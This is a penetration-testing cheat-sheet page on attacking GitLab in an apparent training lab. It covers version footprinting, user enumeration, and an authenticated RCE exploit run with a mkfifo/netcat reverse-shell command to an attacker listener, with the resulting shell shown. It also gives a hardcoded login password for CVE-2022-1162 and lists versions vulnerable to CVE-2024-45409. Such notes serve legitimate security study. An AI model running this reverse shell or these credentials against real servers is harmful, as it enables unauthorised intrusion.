GitLab

Footprinting & Discovery

http://gitlab.inlanefreight.local:8081/users/sign_in

The only way to footprint the GitLab version number in use is by browsing to the /help page when logged in

Enumeration

Browse to /explore and see if there are any public projects that may contain something interesting.

Check and see if we can register an account and access additional projects

User Enumeration

http://gitlab.inlanefreight.local:8081/users/sign_up

GitLab's defaults are set to 10 failed attempts resulting in an automatic unlock after 10 minutes

./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt

Authenticated Remote Code Execution

GitLab Community Edition version 13.10.2 and lower suffered from an authenticated remote code execution

If we encounter a vulnerable version of GitLab that allows for self-registration, we can quickly sign up for an account and pull off the attack. Else, OSINT or password guessing

python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f '

[1] Authenticating
Successfully Authenticated
[2] Creating Payload 
[3] Creating Snippet and Uploading
[+] RCE Triggered !!

nc -lnvp 8443

listening on [any] 8443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.88] 60054

git@app04:~/gitlab-workhorse$ id

id
uid=996(git) gid=997(git) groups=997(git)

Gitlab 14.9 CVE-2022-1162

New Gitlab Accounts (created since the first affect version and if Gitlab is before the patched version) can be logged into with the following password:

123qweQWE!@#000000000

Source: https://x.com/HackerGautam/status/1520624546654867456

GitLab Authentication Bypass (CVE-2024-45409)

All the following GitLab (CE/EE) versions are vulnerable:

< 16.11.10
17.0.0 < 17.0.8
17.0.0 < 17.1.8
17.0.0 < 17.2.7
17.0.0 < 17.3.3

Resources

PreviousExchange / OWA NextJenkins

Last updated 1 month ago